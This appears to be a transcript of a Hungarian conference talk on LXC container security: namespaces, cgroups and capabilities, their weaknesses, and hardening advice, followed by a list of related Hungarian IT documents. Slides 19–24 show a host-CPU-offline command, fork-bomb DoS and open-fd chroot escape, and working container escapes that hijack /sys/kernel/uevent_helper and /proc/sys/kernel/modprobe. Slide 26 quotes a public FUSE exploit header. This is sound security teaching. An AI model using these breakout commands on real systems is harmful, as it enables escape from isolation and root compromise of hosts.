Andrews Kft. Konténerek az IT biztonság szemszögéből. 131 /
|
|
- Zsuzsanna Tóthné
- 7 évvel ezelőtt
- Látták:
Átírás
1 Andrews Kft. Konténerek az IT biztonság szemszögéből 131 /
2 Röviden a virtualizációról Az alap: egy vason, több rendszer. Virtualizáció előnyei: Jobb erőforrás kihasználhatóság. Rendkívüli rugalmasság új létrehozása, meglevő módosítása, másolása (clone), törlése, stb... Virtualizáció fajtái: Hypervisor alapú Operációs rendszer alapú Alkalmazás alapú igen, ők a konténerek 231 /
3 Egy kis konténer történelem /
4 Egy kis konténer történelem /
5 Virtualizációs tipúsokról vizuálisan :) 531 /
6 Virtualizációs tipúsokról vizuálisan :) Processz Processz Processz NET IPC USR Host OS kernel Hardver Normál működés esetén 631 /
7 Virtualizációs tipúsokról vizuálisan :) Processz Processz Processz NET IPC USR Host OS kernel Hardver Normál működés esetén Processz Processz Processz Guest Kernel VM (processz) Processz Processz Processz NET IPC USR NET IPC USR Virt HW Guest Kernel Virt HW VM (processz) NET IPC USR Host OS kernel Hardver Virtuális gépek esetén 731 /
8 Virtualizációs tipúsokról vizuálisan :) Processz Processz Processz Processz NET IPC USR Host OS kernel Hardver Normál működés esetén Processz Processz Processz Guest Kernel VM (processz) Processz Processz Processz NET IPC USR NET IPC USR Virt HW Guest Kernel Virt HW VM (processz) NET IPC USR Host OS kernel Hardver Virtuális gépek esetén 831 /
9 Virtualizációs tipúsokról vizuálisan :) Processz Processz Processz NET IPC USR Host OS kernel Hardver Normál működés esetén Processz Processz Processz Guest Kernel VM (processz) Processz Processz Processz NET IPC USR NET IPC USR Virt HW Guest Kernel Virt HW VM (processz) NET IPC USR Host OS kernel Hardver Virtuális gépek esetén 931 /
10 Virtualizációs tipúsokról vizuálisan :) Processz Processz Processz NET IPC USR Host OS kernel Hardver Processz Processz NET IPC USR NET IPC USR Host OS kernel Hardver Normál működés esetén Konténerek használata esetén Processz Processz Processz Guest Kernel VM (processz) Hardver Processz Processz Processz NET IPC USR NET IPC USR Virt HW Host OS kernel Guest Kernel Virt HW VM (processz) NET IPC USR Virtuális gépek esetén 1031 /
11 Hypervisor vs Containers Teljes hardver környezetet emulál: HW támogatás szükséges A host szempontjából a guest csak 1 processz Host-tól független kernelt, OS-t is képes futtatni Költségesebb a futtatása Felépítéséből biztonságosabb eredően A szükséges alrendszereket példányosítja csak: Nincs speciális HW igény A host szempontjából minden futtatott alkalmazás processz egyedi processz Felépítéséből eredően kicsi az overhead Az összes guest alatt ugyanaz a kernel fut 1131 /
12 Az LXC biztonsági elemzése 1231 /
13 Linux-os konténerek felépítése Két fő részből tevődnek össze Namespace-ekből, feladatuk a példányosítás megvalósítása, fajtái: Chroot/pivot_root az elsők. MOUNT_NS Fájlrendszer (VFS) csatolásokra vonatkozó ns UTS_NS A hostnév névtérét fele. (a konténerünknek eltérhet a neve a hosttól) IPC_NS SHM, semaphores, message queues szerparációját valósítja meg USER_NS UID/GID-ek virtuális megfeleletetésér felel, a konténeren belül lehetnek saját uid-ek és gid-ek ( - ebben volt egy nagyon csúnya bug,!0 0) PID_NS a konténeren belül saját PID névtér van, hiheti magáról bármely processz hogy ő az 1-es PID (init), külső névtér nem címezhető pid alapján PID_NS!= /proc ns (ilyen nincs is...) NET_NS Teljes hálózati stack... Cgroups-okból erőforrások korlátozása cpuset, cpu, cpuacct, freezer, memory, blkio és devices erőforrás csoportok Egyéb: Capabilitik 1331 /
14 Chroot Rendszerhívás ill. a rá épülő segéd alkalmazás (csak) fájlrendszer szintű szeparációt valósít meg a hívó process és leszármazottai számára Ha nem megfelelően hívjuk akkor még fs szinten sem biztonságos Karbantarthatóság? / /var /lib /etc /var/www/.../www/cgi chdir(/var/www) chroot(.).../www/html 1431 /
15 Namespace-ek tulajdonságai Chroot (hierarchikus) Network (izolált) Mount (izolált/klónozható) PID (hierarchikus) UTS/Hostname (izolált) UID (hierarchikus) IPC (izolált) A szülő láthatja a gyerek erőforrásait Izolált NS-ek, nincs kapcsolat Bővebben: Többféle családfa lehetséges /
16 Capability-k A monolitikus root jog szétvált capability -kre Ezek eldobhatóvá váltak, csak azt tartjuk meg ami valóban kell a programunk számára Nem 0 uid is birtokolhatja Parancsok: capsh, man 7 capabilities Fontosabb capability-k: cap_audit_(write control) cap_(mac net sys)_admin cap_kill cap_linux_immutable cap_set_* cap_sys_(chroot module) es kernelben 37 van 1631 /
17 C(ontrol)groups Erőforrás limitáció Processz priorizálás Accounting: az egyes erőforrások használatának mérésére Kontroll: az egyes cgroupok leállítása, és újraindítása Parancsok: man cgcreate Szabályozható erőforrások: CPU Memória Block device-ok elérési sebessége Freezer alrendszer* Hálózati sávszélessére nem nyújt megoldást, arra marad a tc 1731 /
18 Hiányosságok és gyengeségek 1831 /
19 Hiányosságok, gyengeségek... A leggyengébb láncszem a közös kernel (nem Linux spec.) A virtualizált processzek közvetlenül a host kernellel állnak kapcsolatban Egy kernel bugra épülő exploit visz mindent Hypervisor alapú sebezhetőségénél, ez többnyire csak az adott guest-et viszi /proc mínusz PID_NS, /sys Pl: /proc/sys/vm/drop_cache, /proc/sysrq-trigger és társai echo 0 tee /sys/devices/system/cpu/cpu*/online ue memory-val [ ] kvm: disabling virtualization on CPU1 [ ] smpboot: CPU 1 is now offline 1931 /
20 Hiányosságok, gyengeségek... Ulimitek Mivel a konténerekben futó processzek a host kernel számára is valódi processzek, így az egyes processzekre vonatkozó limitek ugyanúgy érvényesek a konténerekben futó processzekre. Fork bombázás A cgroups erőforrás korlátozó beállításai ellenére is kellemetlenek lehetnek a fork bombák: A limitált CPU-t kihajtja ( Na és?! ) A limitált MEMoriát megeszi, swappelteti a rendszert Nyitott FD-ket szépen megeszi (másnak nem marad...) DoS! Max user processes, open files 2031 /
21 Hiányosságok, gyengeségek... Audit alrendszer (3.7-es kernel óta OK, de előtte ) A támadó az audit alrendszeren keresztül feltérképezhette a hoston és a többi konténerben futó processzeket, elég alaposan Kmsg (dmesg) [ ] jelenleg is működik a konténerből olvashatod a kernel üzeneteit, támadásoknál ezek hasznosak lehetnek /proc/sys/kernel/dmesg_restrict a barátunk ilyenkor 2131 /
22 Pivot_root / chroot Mik ezek? És hogyan lehet vele kitörni a konténerből vele? Chroot: This call does not close open file descriptors, and such file descriptors may allow access to files outside the chroot tree. Egy szép demonstárciója a problémának Lxc hív egy pivot_root vált rootfs-t, nyítva hagyja a kitöréshez szükséges fd-t lilo@hargita:~$ ps axfw grep lxc-start -C ? S 0:00 \_ lxc-start -n rr ? Ss 0:00 \_ /sbin/init lilo@hargita:~$ cd /proc; sudo ls -l 10294/root 10310/root Lrwxrwxrwx okt 17 11:09 /proc/10294/root -> / Lrwxrwxrwx okt 17 11:09 /proc/10310/root -> / 2231 /
23 kitörés a sysfs-en keresztül Ha root vagy a konténerben root leszel kint is... root@lxc# cat /tmp/evil_helper #!/bin/bash set >> /tmp/alma1 date >> /tmp/alma1 root@lxc# echo /var/lib/lxc/lxc/rootfs/tmp/evil_helper > /sys/kernel/uevent_helper root@lxc# cat /sys/kernel/uevent_helper /var/lib/lxc/lxc/rootfs/tmp/evil_helper root@lxc# echo change > /sys/class/mem/null/uevent hatására lefut a /var/lib/lxc/lxc/rootfs/tmp/evil_helper 2331 /
24 kitörés a procfs-en keresztül root@lxc# cat /tmp/x #!/bin/bash mkdir /tmp/12345alma root@lxc# cat /proc/sys/kernel/modprobe /sbin/modprobe root@lxc# echo /var/lib/lxc/lxc/rootfs/tmp/x > /proc/sys/kernel/modprobe root@telekom-vpn:/proc# iptables -t raw -nl iptables v1.4.21: can't initialize iptables table `raw': Table does not exist (do you need to insmod?) root@host:ls -dl /tmp/12345alma/ drw-rw root root 40 máj 19 09:41 /tmp/12345alma/ 2431 /
25 Ismert biztonsági hibák az implementációban [7.1] CVE : olyan hibát tartalmazott mely csak a network namespace használata esetén volt támadható [???] git:41c21e351e: talán nem exploitálható user_namespace bug... [7.8] CVE : DoS network namespace-en keresztül [7.2] CVE : biztosan exploitálható user_namespace bug [Lásd következő slide-on] [2.1] CVE : át lehetett chrootolni más (akár több joggal rendelkező) namespaceekbe [4.7] CVE : user_namespace memória szivágós DoS [6.2] CVE : állományrendszer capabilitik segítségével ki lehetett törni a konténerekből [7.2] CVE : nem védett a MNT_LOCK_READONLY mount flag módosítása ellen, újra lehetett mountolni RW módban [6.0] CVE : a fentiek mintájára a MNT_NODEV, MNT_NOSUID, és MNT_NOEXEC valamint MNT_ATIME_MASK opciók kijátszhatóak voltak egy kis bind mountolgatás segítségével* [4.6] CVE : lehetővé tette a csoporttagságok módosítását ezáltal a kizáró csoport alapú ACL-ek kijátszhatóak voltak 2531 /
26 Egy két érdekesség a hibákról CVE működése /* FUSE-based exploit for CVE Copyright (c) 2014 Andy Lutomirski CVE publikus exploitja Based on code that is: Copyright (C) Miklos Szeredi <miklos@szeredi.hu> This program can be distributed under the terms of the GNU GPL. See the file COPYING. gcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid mkdir test./fuse_suid test This isn't a work of art: it doesn't clean up after itself very well. */ 2631 /
27 Védelmi lehetőségekről 2731 /
28 Védelmi lehetőségek, teendők 1. Az alaprendszer megerősítése Pax/Grsec, Apparmor, SELinux Szedjük szét több gépre a konténereinket, biztonsági besorolásuk szerint (akár a valódi hostok hálózati szeparációja esetében) Konténerek megerősítése Unpriveledged Containers, kontérnerek normál userként futnak! Capabilitik megfelelő használata Állományrendszer szintű capability-k este lxc.cgroup.devices lxc.cgroup.devices.deny = a # mindent tilos, lxc.cgroup.devices.allow = # kivéve amit szabad elv alkalmazása Minimalizálni kell a konténerben rootként futó alkalmazások számát és ha lehet jogait /
29 Védelmi lehetőségek, teendők 2. Seccomp alkalmazása Az LXC configban van rá lehetőség és példa konfig is A /proc és /sys mountolásának felülvizsgálata (részleges mount, RO mount) Auditd hangolása a konténerek felügyeletére Securebits (SECURE_NOROOT, SET_DUMPABLE) és társainak használata, man prctl :) Cgroups-ok mellett érdemes figyelni az rlimit-ek értékeire 2931 /
30 Hasznos biztonsági kütyük mbox firejail minijail Olvasnivalók /
31 Vége Köszönöm a figyelmet! Kérdések? 3131 /
Andrews Kft. Konténerek az IT biztonság szemszögéből. <zambo.marcell@andrews.hu>
Andrews Kft. Konténerek az IT biztonság szemszögéből Röviden a virtualizációról Az alap: egy vason, több rendszer. Virtualizáció előnyei: Jobb erőforrás kihasználhatóság. Rendkívüli
RészletesebbenVirtualizációs Technológiák Operációs rendszer szintű virtualizáció Konténerek Forrás, BME-VIK Virtualizációs technológiák
Virtualizációs Technológiák Operációs rendszer szintű virtualizáció Konténerek Forrás, BME-VIK Virtualizációs technológiák https://www.vik.bme.hu/kepzes/targyak/vimiav89/ Koncepció Ha megfelel, hogy azonos
Részletesebben[29 / 1] Linux biztonsági lehetőségeinek áttekintése
[29 / 1] Linux biztonsági lehetőségeinek áttekintése Linux biztonsági lehetőségeinek áttekintése. [29 / 2] Linux biztonsági lehetőségeinek áttekintése Mi az a Linux? A Linux
RészletesebbenAppArmor. Névalapú kötelező hozzáférés-vezérlés PPKE-ITK. 2014. március április
AppArmor Névalapú kötelező hozzáférés-vezérlés PPKE-ITK 2014. március április Tartalomjegyzék 1. Bevezetés 2 1.1. Történet........................................ 2 1.2. Az AppArmor célja..................................
RészletesebbenUtolsó módosítás:
Utolsó módosítás: 2012. 09. 06. 1 A tantárggyal kapcsolatos adminisztratív kérdésekkel Micskei Zoltánt keressétek. 2 3 4 5 6 7 8 9 Forrás: Gartner Hype Cycle for Virtualization, 2010, http://premierit.intel.com/docs/doc-5768
RészletesebbenUNIX / Linux rendszeradminisztráció
UNIX / Linux rendszeradminisztráció VIII. előadás Miskolci Egyetem Informatikai és Villamosmérnöki Tanszékcsoport Általános Informatikai Tanszék Virtualizáció Mi az a virtualizáció? Nagyvonalúan: számítógép
RészletesebbenAdatbázis és alkalmazás konszolidáció Oracle SPARC T4/5 alapon
Adatbázis és alkalmazás konszolidáció Oracle SPARC T4/5 alapon Makár Zénó 2013. október 9. Invigor Informatika Kft 4 éve alakult Oracle Gold Partner HW és SW specializációk Oracle HW Support Provider Szolgáltatások
RészletesebbenVirtualizáció. egy hardveren több virtuális rendszer működik egyszerre, virtuális gépekben futó önálló vendég (guest) operációs rendszerek formájában
Virtualizáció Virtualizáció fogalma: Virtualizáció egy hardveren több virtuális rendszer működik egyszerre, virtuális gépekben futó önálló vendég (guest) operációs rendszerek formájában A virtualizáció
RészletesebbenA Docker alapjai. Takács Ákos PTE Egyetemi Könyvtár és Tudásközpont TAKÁCS ÁKOS - IPSZILON SZEMINÁRIUM - A DOCKER ALAPJAI 1
A Docker alapjai Takács Ákos PTE Egyetemi Könyvtár és Tudásközpont 2017.09.20. TAKÁCS ÁKOS - IPSZILON SZEMINÁRIUM - A DOCKER ALAPJAI 1 Docker alapjai VIRTUALIZÁCIÓS MEGOLDÁSOK, ÚT A DOCKERIG 2017.09.20.
RészletesebbenOPERÁCIÓS RENDSZEREK I. BEVEZETÉS Koczka Ferenc -
OPERÁCIÓS RENDSZEREK I. BEVEZETÉS Koczka Ferenc - koczka.ferenc@ektf.hu KÖVETELMÉNYEK GYAKORLATI JEGY: Két zárthelyi dolgozat eredményes megírása. Forrás: http://wiki.koczka.hu ELMÉLETI VIZSGA Az előadások
RészletesebbenSzerverterem egy számítógépben avagy hogyan élnek a barack lakói. Mátó Péter <mato.peter@fsf.hu>
Szerverterem egy számítógépben avagy hogyan élnek a barack lakói Mátó Péter 1 A barack rövid története I. A rendszer az OpenOffice.org menüjének honosítása után, a projekt weboldalának
RészletesebbenVirtualizáció szabad szoftverekkel. Mátó Péter <mato.peter@andrews.hu>
Virtualizáció szabad szoftverekkel Mátó Péter 1 Az előzmények 1960: IBM CP-40 PC Unix: chroot (4.2BSD: 1982), BSD: jail (FreeBSD: 2006) VMWare (VMW WS: 1999, VMW GSX: 2001) Windows
RészletesebbenLOK 2010. Virtualizáció. szabad szofverekkel. Mátó Péter <mato.peter@andrews.hu>
LOK 2010 Virtualizáció szabad szofverekkel Mátó Péter 1 Néhány érdekes adat A ma kapható legkisebb számítógép: processzor: 1,6GHz, memória: 1GB, diszk: 160GB Egy átlagos céges weblap
RészletesebbenSzalai Ferenc szferi@avaxio.hu. http://www.avaxio.hu
Virtualizáció Linuxon: XEN Szalai Ferenc szferi@avaxio.hu Bevezető Mit? Miért? intézményi vállalati szolgáltatásokat (web, állomány, levelező szerver, egyedi teszt rendszerek, virtuális oktatási hálózatok)
RészletesebbenFelhő alapú hálózatok (VITMMA02) OpenStack Neutron Networking
Felhő alapú hálózatok (VITMMA02) OpenStack Neutron Networking Dr. Maliosz Markosz Budapesti Műszaki és Gazdaságtudományi Egyetem Villamosmérnöki és Informatikai Kar Távközlési és Médiainformatikai Tanszék
RészletesebbenVirtualizációs technológiák Linux alatt (teljesítményteszt)
Virtualizációs technológiák Linux alatt (teljesítményteszt) Ebben a dokumentációban a virtualizációs technológiák sebességét, teljesítményét hasonlítom össze RedHat-alapú Linux disztribúciókkal. A teszteléshez
RészletesebbenOPERÁCIÓS RENDSZEREK II GYAKORLAT
OPERÁCIÓS RENDSZEREK II GYAKORLAT 4. óra: Folyamatok Windisch Gergely windisch.gergely@nik.uni-obuda.hu 2010 / 2011 tavaszi félév FOLYAMATKEZELÉS ALAPOK linuxban minden, amit elindítunk, az egy folyamat.
RészletesebbenInformatikai Rendszerek Intézete Gábor Dénes Foiskola. Operációs rendszerek - 105 1. oldal LINUX
1. oldal LINUX 2. oldal UNIX történet Elozmény: 1965 Multics 1969 Unix (Kernighen, Thompson) 1973 Unix C nyelven (Ritchie) 1980 UNIX (lényegében a mai forma) AT&T - System V Microsoft - Xenix Berkeley
RészletesebbenUtolsó módosítás:
Utolsó módosítás: 2011. 09. 08. 1 A tantárggyal kapcsolatos adminisztratív kérdésekkel Micskei Zoltánt keressétek. 2 3 4 5 6 7 8 9 10 11 12 13 14 Erősen buzzword-fertőzött terület, manapság mindent szeretnek
RészletesebbenAz időhöz kötődő parancsok
Az időhöz kötődő parancsok Az idő nyilvántartása...1 A date parancs...2 A time parancs...4 A sleep parancs...5 Időzített programfuttatás...6 Az at parancs...6 A UNIX démonok...6 A cron démon...7 Az idő
RészletesebbenUNIX: fájlrendszerek
UNIX: fájlrendszerek kiegészítő fóliák az előadásokhoz Mészáros Tamás http://home.mit.bme.hu/~meszaros/ Budapesti Műszaki Egyetem Méréstechnika és Információs Rendszerek Tanszék 1 Alapfogalmak Fájl (állomány,
RészletesebbenTI TMDSEVM6472 rövid bemutatása
6.6.1. Linux futtatása TMDSEVM6472 eszközön TI TMDSEVM6472 rövid bemutatása A TMDSEVM6472 az alábbi fő hardver paraméterekkel rendelkezik: 1db fix pontos, több magos (6 C64x+ mag) C6472 DSP 700MHz 256MB
RészletesebbenCloud computing. Cloud computing. Dr. Bakonyi Péter.
Cloud computing Cloud computing Dr. Bakonyi Péter. 1/24/2011 1/24/2011 Cloud computing 2 Cloud definició A cloud vagy felhő egy platform vagy infrastruktúra Az alkalmazások és szolgáltatások végrehajtására
RészletesebbenOperációs rendszerek. UNIX fájlrendszer
Operációs rendszerek UNIX fájlrendszer UNIX fájlrendszer Alapegység: a file, amelyet byte-folyamként kezel. Soros (szekvenciális) elérés. Transzparens (átlátszó) file-szerkezet. Link-ek (kapcsolatok) létrehozásának
RészletesebbenKönyvtári szervervirtualizáció Oracle Virtual Machine platformon
Könyvtári szervervirtualizáció Oracle Virtual Machine platformon avagy a virtualizáció licenszgazdálkodásra is használható? Marton József Ernő jmarton@omikk.bme.hu Nagy Elemér Károly eknagy@omikk.bme.hu
RészletesebbenAz internet ökoszisztémája és evolúciója. Gyakorlat 1
Az internet ökoszisztémája és evolúciója Gyakorlat 1 GNS3: installálás és konfiguráció GNS3: hálózatszimulátor Valódi router/hoszt image-ek hálózatba kapcsolása emulált linkeken keresztül: CISCO, Juniper,
RészletesebbenLéteznek nagyon jó integrált szoftver termékek a feladatra. Ezek többnyire drágák, és az üzemeltetésük sem túl egyszerű.
12. Felügyeleti eszközök Néhány számítógép és szerver felügyeletét viszonylag egyszerű ellátni. Ha sok munkaállomásunk (esetleg több ezer), vagy több szerverünk van, akkor a felügyeleti eszközök nélkül
RészletesebbenCloud computing Dr. Bakonyi Péter.
Cloud computing Dr. Bakonyi Péter. 1/24/2011 Cloud computing 1/24/2011 Cloud computing 2 Cloud definició A cloud vagy felhő egy platform vagy infrastruktúra Az alkalmazások és szolgáltatások végrehajtására
RészletesebbenHogyan működtethető a telefonrendszer virtuális környezetben? Mészáros Tamás Műszaki fejlesztési vezető
Hogyan működtethető a telefonrendszer virtuális környezetben? Mészáros Tamás Műszaki fejlesztési vezető Mi is az a virtualizáció? Az erőforrások elvonatkoztatása az erőforrást nyújtó elemektől - kellemesen
RészletesebbenUNIX fájlrendszerek alapismeretei
UNIX fájlrendszerek alapismeretei kiegészítő fóliák az előadásokhoz Mészáros Tamás http://home.mit.bme.hu/~meszaros/ Budapesti Műszaki és Gazdaságtudományi Egyetem Méréstechnika és Információs Rendszerek
RészletesebbenBiztonságos desktop megoldás: Qubes OS
Andrews IT Engineering Kft. A probléma avagy, miért nem jók a mostani operációs rendszerek Képzeljünk el egy hagyományos operációs rendszert (Windows, Linux, Mac) Természetesen mindenki más és más alkalmazásokat
RészletesebbenLinux fájlrendszerek. Papp Zsolt. Rendszermérnök, Novell PSH. papp.zsolt@npsh.hu
Linux fájlrendszerek Papp Zsolt Rendszermérnök, Novell PSH papp.zsolt@npsh.hu Az előadásról Mi az a fájlrendszer? Naplózó fájlrendszerek Hol léteznek a fájlrendszerek Elérhető fájlrendszerek Linux alatt
RészletesebbenSegesdi Dániel. OpenNebula. Virtualizációs technológiák és alkalmazásaik BMEVIMIAV89. 2011 ősz
Segesdi Dániel OpenNebula Virtualizációs technológiák és alkalmazásaik BMEVIMIAV89 2011 ősz OpenNebula Előszó A feladatom az OpenNebula nyílt forráskódú cloud management eszköz megismerése, mely egységes
RészletesebbenProcesszusok (Processes), Szálak (Threads), Kommunikáció (IPC, Inter-Process Communication)
1 Processzusok (Processes), Szálak (Threads), Kommunikáció (IPC, Inter-Process Communication) 1. A folyamat (processzus, process) fogalma 2. Folyamatok: műveletek, állapotok, hierarchia 3. Szálak (threads)
RészletesebbenFelhő alapú hálózatok Konténer alapú virtualizáció Dr. Simon Csaba
Felhő alapú hálózatok Konténer alapú virtualizáció Dr. Simon Csaba 2016. 05. 03. Budapesti Műszaki és Gazdaságtudományi Egyetem 1 KONTÉNEREK 2 Virtualizáció és teljesítmény?» Motiváció:» Virtualizáció
Részletesebben2. lépés: openssh szerver telepítés sudo apt-get install openssh-server
1. lépés: (master- és datanode esetén) Csoport készítés: sudo addgroup hadoop Felhasználók készítése: sudo adduser --ingroup hadoop yarn sudo adduser --ingroup hadoop hdfs sudo adduser --ingroup hadoop
RészletesebbenUtolsó módosítás:2010. 10. 21.
Utolsó módosítás:2010. 10. 21. 1 2 Most a vastagon kiemeltekkel foglalkozunk, a többi majd későbbi előadásokban kerül terítékre. 3 4 5 6 Szervereknél gyakori megoldás, hogy valamilyen dedikált hardver
Részletesebben1_Linux_bevezeto_bash
1_Linux_bevezeto_bash September 21, 2016 1 Számítógépes alapismeretek 1.1 ELTE - Fizika Bsc 1. évfolyam 1.2 # Félévés tematika: Linux alapismeretek Szövegszerkesztés Adatok ábrázolása Bevezetés a programozás
RészletesebbenOptimalizáció ESX-től View-ig. Pintér Kornél ügyfélszolgála3 mérnök pinter_kornel@mhm.hu
Optimalizáció ESX-től View-ig Pintér Kornél ügyfélszolgála3 mérnök pinter_kornel@mhm.hu MHM és referenciák MHM Computer Hungária Kft. 1996 óta Magyarországon Fókuszterületek: Adattárolás Adatmentés Archiválás
RészletesebbenUnix-Linux alapok I. gyakorlatvezető: Lutár Patrícia
Unix-Linux alapok I. gyakorlatvezető: Lutár Patrícia Ez a dokumentum az órán bemutatott alapparancsoknak egy vázlatos áttekintése. A parancsokhoz tartozó kapcsolók/opciók (flagek) felsorolása nem teljes.
RészletesebbenOperációs rendszerek. Az NT folyamatok kezelése
Operációs rendszerek Az NT folyamatok kezelése Folyamatok logikai felépítése A folyamat modell: egy adott program kódját végrehajtó szál(ak)ból és, a szál(ak) által lefoglalt erőforrásokból állnak. Folyamatok
RészletesebbenAz internet ökoszisztémája és evolúciója. Gyakorlat 1
Az internet ökoszisztémája és evolúciója Gyakorlat 1 GNS3: installálás és konfiguráció GNS3: hálózatszimulátor Valódi router/hoszt image-ek hálózatba kapcsolása emulált linkeken keresztül: CISCO, Juniper,
RészletesebbenOperációs rendszerek III.
A WINDOWS NT memóriakezelése Az NT memóriakezelése Memóriakezelő feladatai: Logikai-fizikai címtranszformáció: A folyamatok virtuális címterének címeit megfelelteti fizikai címeknek. A virtuális memóriakezelés
RészletesebbenOperációs rendszerek. UNIX/Linux fájlrendszerek
Operációs rendszerek UNIX/Linux fájlrendszerek Tartalom Linux fájlrendszerek UNIX/Linux fájlrendszerek Szimbolikus linkek Fájlrendszerek csatolása Virtuális fájlrendszer Szuperblokk Inode Objektumok 2
RészletesebbenOperációs Rendszerek II. labor. 4-5. alkalom
Operációs Rendszerek II. labor 4-5. alkalom Több program egyszerre Többszörös bejelentkezéssel triviális Egy shell alól is lehet: Indítás háttérben: & Futó program felfüggesztése: CTRL-Z Háttérbe
RészletesebbenProcesszusok (Processes), Szálak (Threads), Kommunikáció (IPC, Inter-Process Communication)
1 Processzusok (Processes), Szálak (Threads), Kommunikáció (IPC, Inter-Process Communication) 1. A folyamat (processzus, process) fogalma 2. Folyamatok: műveletek, állapotok, hierarchia 3. Szálak (threads)
RészletesebbenAlternatív processz állapot és statisztika lekérdezési módszer a Linux kernelben
Alternatív processz állapot és statisztika lekérdezési módszer a Linux kernelben 2011. október 13. Az alapprobléma A processzek állapotát gyakran le kell kérdezni. Az ehhez használatos eszközök: ps top
RészletesebbenA 21. század adatközpontja Oracle Solaris alapon
Fejlődő adatközpontok: Innovációra tervezve... A 21. század adatközpontja Oracle Solaris alapon Farkas András Oracle Hungary Kft. 1 Copyright 2011, Oracle and/or its affiliates. All rights Újra fogalmaztuk
RészletesebbenHálózatok építése és üzemeltetése
Hálózatok építése és üzemeltetése Linux 1 Rendszergazda jogosultságok (Fehér Gábor slide-jai) 2 Root jogosultságok Többfelhasználós rendszerekben adminisztrációs teendők Felhasználók menedzselése Külső
RészletesebbenVMware vsphere. Virtuális Hálózatok Biztonsága. Zrubecz.Laszlo@andrews.hu. Andrews IT Engineering Kft.
Virtuális Biztonsága Andrews IT Engineering Kft. 1 Fizikai hálózatok Virtuális hálózatok VLAN 2 Hardver környezet ESX beállítások (ESXi, ESX) 3 4 vshield Manager vshield Zones/vShield App vshield Edge
RészletesebbenMagyar Posta központi Oracle infrastruktúrája VMware alapokon
Magyar Posta központi Oracle infrastruktúrája VMware alapokon MP Zrt. Oracle infrastruktúra 1. Eredeti állapot Tervezés 2. Virtuális platform kiválasztása 3. Környezet felépítése 4. Üzemeltetési kihívások
RészletesebbenOPERÁCIÓS RENDSZEREK 1. PROCESSZKEZELÉS
OPERÁCIÓS RENDSZEREK 1. PROCESSZKEZELÉS A PROCESSZ A PROCESSZ Program: a végrehajtandó utasítások sorozata Processz: a végrehajtás alatt levő program ÁLLAPOTOK LÉTREHOZÁS ALATT Belépés Kilépés TERMINÁLT
RészletesebbenVirtualizációs Technológiák Bevezetés Kovács Ákos Forrás, BME-VIK Virtualizációs technológiák
Virtualizációs Technológiák Bevezetés Kovács Ákos Forrás, BME-VIK Virtualizációs technológiák https://www.vik.bme.hu/kepzes/targyak/vimiav89/ Mi is az a Virtualizáció? Az erőforrások elvonatkoztatása az
RészletesebbenVirtuális gépben futtatott CPU-emulátor teljesítményének vizsgálata
Budapesti Műszaki és Gazdaságtudományi Egyetem Virtualizációs technológiák és alkalmazásaik (VIMIAV89) Virtuális gépben futtatott CPU-emulátor teljesítményének vizsgálata Házi feladat Tóth Tamás (RRDDD0)
RészletesebbenOperációs rendszerek gyakorlat
01 Operációs rendszerek gyakorlat Berta Árpád berta@inf.u-szeged.hu www.inf.u-szeged.hu/~berta Irinyi magasföldszint, Mesterséges Intelligencia kutatócsoport, 45/A szoba Fogadó óra: hétfő 15:00-16:00-ig
RészletesebbenUNIX: folyamatok kommunikációja
UNIX: folyamatok kommunikációja kiegészítő fóliák az előadásokhoz Mészáros Tamás http://home.mit.bme.hu/~meszaros/ Budapesti Műszaki Egyetem Méréstechnika és Információs Rendszerek Tanszék 1 A kommunikáció
RészletesebbenVirtualizációs technológiák és alkalmazások. Házi feladat. A Virtualbox. készítette: Andrus Tamás
Virtualizációs technológiák és alkalmazások Házi feladat készítette: Andrus Tamás Bevezető a honlapjuk (http://virtualbox.org) tanúsága szerint az egyetlen nyílt forrású virtualizációs szoftver a piacon.
RészletesebbenOperációs Rendszerek II. Első verzió: 2009/2010. I. szemeszter Ez a verzió: 2009/2010. II. szemeszter
Operációs Rendszerek II. Első verzió: 2009/2010. I. szemeszter Ez a verzió: 2009/2010. II. szemeszter 1 Mai témák ZFS NTFS 2 ZFS Új koncepció, nem továbbgondolás Pooled storage modell Minden művelet copy-on-write
RészletesebbenOperációs rendszerek. Windows NT. A Windows NT
Operációs rendszerek Windows NT A Windows NT Felépítésében is új operációs rendszer: New Technology (NT) 32-bites Windows-os rendszerek felváltása Windows 2000: NT alapú 1 Operációs rendszerek felépítése
RészletesebbenTémák. Betörés megelőző rendszerek. Mire használhatjuk az IDS-t? Mi az IDS? (Intruding Detection System)
Témák Betörés megelőző rendszerek Molnár Zoltán Vilmos 2003.12.03 Elméleti áttekintés Betörés megelőző rendszerek működése Betörés megelőző rendszer építése nyílt forrású rendszerekkel Mi az IDS? (Intruding
RészletesebbenVerziókezelt konfigurációmanagement++ Pásztor György, SZTE Klebelsberg Könyvtár pasztor@ek.szte.hu
Verziókezelt konfigurációmanagement++ Pásztor György, SZTE Klebelsberg Könyvtár pasztor@ek.szte.hu Áttekintés 2 Probléma felvetése: konfiguráció verziókezelten Igények áttekintése Saját megoldás nyújtotta
RészletesebbenUtolsó módosítás:
Utolsó módosítás: 2011. 10. 21. 1 2 Most a vastagon kiemeltekkel foglalkozunk, a többi majd későbbi előadásokban kerül terítékre. 3 4 5 6 7 Szervereknél gyakori megoldás, hogy valamilyen dedikált hardver
RészletesebbenLINUX PMB2506-2 LINUXOS PARANCSOK ÉS HASZNÁLATUK - GRUB
LINUX PMB2506-2 LINUXOS PARANCSOK ÉS HASZNÁLATUK - GRUB LINUX PARANCSOK ÉS HASZNÁLATUK ls: listázás -l részletes lista -a rejtett fájlok megjelenítése cp: fájlok másolása -i Már létező cél felülírása előtt
Részletesebben(kernel3d vizualizáció: kernel245_graph.mpg)
(kernel3d vizualizáció: kernel245_graph.mpg) http://www.pabr.org/kernel3d/kernel3d.html http://blog.mit.bme.hu/meszaros/node/163 1 (ml4 unix mérés boot demo) 2 UNIX: folyamatok kezelése kiegészítő fóliák
RészletesebbenAz alábbiakban néhány Linux parancsra látunk példákat, feladatokat.
Linux parancsok Az alábbiakban néhány Linux parancsra látunk példákat, feladatokat. Fájlműveletek 1. Hozzunk létre egy linux munka nevű könyvtárat! mkdir linux munka 2. Lépjünk be a linux munka könyvtárba,
RészletesebbenUtolsó módosítás:
Utolsó módosítás:2011. 09. 29. 1 2 4 5 MMU!= fizikai memóriaillesztő áramkör. Az utóbbinak a feladata a memória modulok elektromos alacsonyszintű vezérlése, ez sokáig a CPU-n kívül a chipset északi hídban
RészletesebbenGyakorla( útmutató és demonstrációk a SZTAKI Felhő használatához
